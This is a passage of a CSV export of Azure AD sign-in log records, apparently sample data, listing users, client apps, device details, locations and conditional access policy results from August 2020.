'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 18:00,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",3b0e5c51-5aba-4adb-89c0-6eabd1251800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,3b0e5c51-5aba-4adb-89c0-6eabd1251800,SigninLogs,Sucess,41.90428925,-85.99833679
+1829,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:29.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7b8d0704-527d-43b3-a82a-75b06ed74d5f,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:00,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",3b0e5c51-5aba-4adb-89c0-6eab27261800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,3b0e5c51-5aba-4adb-89c0-6eab27261800,SigninLogs,Sucess,41.90428925,-85.99833679
+1830,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:23.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:32,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",f98b089c-4d87-4d7b-b046-5cf34f784f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f98b089c-4d87-4d7b-b046-5cf34f784f00,SigninLogs,Sucess,35.01296997,-80.93171692
+1831,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,29:15.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:29,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",706a2dd3-094a-48d6-89ad-9f7dd5cb5100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,706a2dd3-094a-48d6-89ad-9f7dd5cb5100,SigninLogs,Sucess,35.01296997,-80.93171692
+1832,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:06.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5f11d930-41ca-43a7-b362-f3ce13c11700,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5f11d930-41ca-43a7-b362-f3ce13c11700,SigninLogs,Sucess,33.0175209,35.44601059
+1833,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:23.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:32,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",f98b089c-4d87-4d7b-b046-5cf34f784f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f98b089c-4d87-4d7b-b046-5cf34f784f00,SigninLogs,Sucess,35.01296997,-80.93171692
+1834,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:33.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:33,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",1876eddf-482a-4dc9-a9d6-7c1be8015100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,1876eddf-482a-4dc9-a9d6-7c1be8015100,SigninLogs,Sucess,35.01296997,-80.93171692
+1835,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:16.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ffd1469f-609a-0000-5683-47b9a51ec72d,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 18:00,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",88812ca6-4188-4e59-83ab-d71dda831600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,88812ca6-4188-4e59-83ab-d71dda831600,SigninLogs,Sucess,41.90428925,-85.99833679
+1836,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:07.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 